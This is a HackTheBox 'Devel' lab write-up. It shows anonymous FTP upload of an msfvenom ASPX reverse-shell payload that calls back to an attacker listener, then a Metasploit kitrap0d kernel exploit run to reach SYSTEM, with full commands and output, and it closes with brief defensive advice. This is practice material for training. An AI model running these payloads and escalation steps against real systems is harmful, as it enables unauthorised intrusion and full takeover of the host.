WriteUp: HackTheBox Devel

This is my second box in HackTheBox. There are probably a couple of different ways to exploit this but I went with the FTP path as FTP is known to be vulnerable. Maybe later in time, I will come back and try to exploit it using HTTP (if at all possible). We first exploit a vulnerability that gives us user access. As user, we are able to exploit another privilege escalation vulnerability that allows us to become system.

Table of Contents

  1. Reconnaissance
  2. Enumeration
  3. Exploitation
  4. Privilege Escalation
  5. Post Exploitation
  6. Defender’s Note

Reconnaissance

We’ll start with checking which open ports are available to us.

$ nmap -A -T4 -p- 10.10.10.5

We get the following output.

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

We see that we have anonymous FTP login allowed and HTTP that allows for trace. We also see the specific HTTP server being used.

Enumeration

Since we have anonymous logon enabled via FTP. That would be a low hanging fruit to start with.

FTP

Let’s try login using the username and password anonymous.

$ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:badmin): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp>

And we are in. Let’s just verify whether or not we can read files / put files into the server.

ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection.
03-18-17  02:06AM       <DIR>          aspnet_client
03-17-17  05:37PM                  689 iisstart.htm
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.
ftp> put test.txt 
local: test.txt remote: test.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.

Exploitation

FTP

Let’s generate a payload using msfvenom that is specific for asp.

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.6 LPORT=4444 -f aspx > example.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of aspx file: 2896 bytes
$ ls example.aspx 
example.aspx

The file *example.aspx* is generated in the same folder.

msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.6
LHOST => 10.10.14.6
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.6       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

Let’s run this.

msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.14.6:4444 

We see that the listener is on so let’s switch back to ftp and transfer that file to the server.

ftp> put example.aspx 
local: example.aspx remote: example.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2933 bytes sent in 0.00 secs (1.2526 MB/s)

Let’s access that malware and make the server execute it by navigating to [http://10.10.10.5/example.aspx].

From the listener, we see that we got a session

[*] Sending stage (175174 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.6:4444 -> 10.10.10.5:49158) at 2021-06-24 08:51:04 +0100
meterpreter > 

When we verify the system details and user id, we see that we have no authority as we are not system user.

meterpreter > sysinfo
Computer        : DEVEL
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : 0
Meterpreter     : x86/windows
meterpreter > getuid
Server username: IIS APPPOOL\Web

Privilege Escalation

Since we have access now, we can use post modules to try and escalate privileges. We can see form the available suggestions that there is only one module that we can use now.

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > search suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester


Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester

Let’s go ahead and use that module. The options require that we set the session number we want to interact with.


msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.5 - Collecting local exploits for x86/windows...

Once we run the module, we see a couple of exploits that we could use in this case.

[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

We’ll go with ms10_015_kitrap0d which is a vulnerability of the Windows Kernel from 2010 that allows for privilege escalation. In addition to the session details, we need to specify our IP address that maps to the tunnel 0 interface.

msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_015_kitrap0d
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms10_015_kitrap0d) > options

Module options (exploit/windows/local/ms10_015_kitrap0d):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.176.95   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 2K SP4 - Windows 7 (x86)


msf6 exploit(windows/local/ms10_015_kitrap0d) > set session 2
session => 2
Exploit target:

   Id  Name
   --  ----
   0   Windows 2K SP4 - Windows 7 (x86)
msf6 exploit(windows/local/ms10_015_kitrap0d) > set LHOST 10.10.14.6
LHOST => 10.10.14.6

Everything is set now. Let’s run the module.

msf6 exploit(windows/local/ms10_015_kitrap0d) > run

[*] Started reverse TCP handler on 10.10.14.6:4444 
[*] Launching notepad to host the exploit...
[+] Process 632 launched.
[*] Reflectively injecting the exploit DLL into 632...
[*] Injecting exploit into 632 ...
[*] Exploit injected. Injecting payload into 632...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175174 bytes) to 10.10.10.5
[*] Meterpreter session 3 opened (10.10.14.6:4444 -> 10.10.10.5:49163) at 2021-06-24 09:02:56 +0100

We now have a session with the system and this time round, we are logged in as user SYSTEM.

meterpreter > sysinfo
Computer        : DEVEL
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : 0
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Post Exploitation

Let’s drop down to the shell to interact with the Windows machine.

meterpreter > shell
Process 1024 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

c:\windows\system32\inetsrv> cd ../../..
 cd ../../..

Let’s see which users are available for us. We see we have Administrator and babis.

c:\>cd Users    
cd Users

c:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of c:\Users

18/03/2017  02:16 ��    <DIR>          .
18/03/2017  02:16 ��    <DIR>          ..
18/03/2017  02:16 ��    <DIR>          Administrator
17/03/2017  05:17 ��    <DIR>          babis
18/03/2017  02:06 ��    <DIR>          Classic .NET AppPool
14/07/2009  10:20 ��    <DIR>          Public
               0 File(s)              0 bytes
               6 Dir(s)  22.198.059.008 bytes free

User Flag

The user flag is normally located on a desktop of a normal user (C:\Documents and Settings\User\Desktop). In this case, we need to traverse to the desktop of user “babis”. Once in the directory, we see the “user.txt.txt” file which we can read the contents of using the “type” command.

c:\Users\babis>cd Desktop
cd Desktop

c:\Users\babis\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of c:\Users\babis\Desktop

18/03/2017  02:14 ��    <DIR>          .
18/03/2017  02:14 ��    <DIR>          ..
18/03/2017  02:18 ��                32 user.txt.txt
               1 File(s)             32 bytes
               2 Dir(s)  22.197.534.720 bytes free
c:\Users\babis\Desktop>type user.txt.txt
type user.txt.txt
9ecddXXXXXXXXXXXXXXf4cb3e8

Root flag

The root flag is normally located on a desktop of Administrator (C:\Documents and Settings\Administrator\Desktop). Once in the directory, we see the “root.txt” file which we can read the contents of using the “type” command.

c:\Users\babis\Desktop>cd ../../
cd ../../

c:\Users>cd Administrator
cd Administrator

c:\Users\Administrator>cd Desktop
cd Desktop

c:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of c:\Users\Administrator\Desktop

14/01/2021  12:42 ��    <DIR>          .
14/01/2021  12:42 ��    <DIR>          ..
18/03/2017  02:17 ��                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  22.190.256.128 bytes free

c:\Users\Administrator\Desktop>type root.txt
type root.txt
e621a0XXXXXXXXXXXXXXXbc72b4b

Defender’s Note

  1. FTP is a very insecure protocol as it sends traffic in clear text. Opt for more secure versions such as SFTP, FTPS and the likes.
  2. If you have to use FTP, disable anonymous login for FTP server.
  3. Patch systems in a timely manner.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s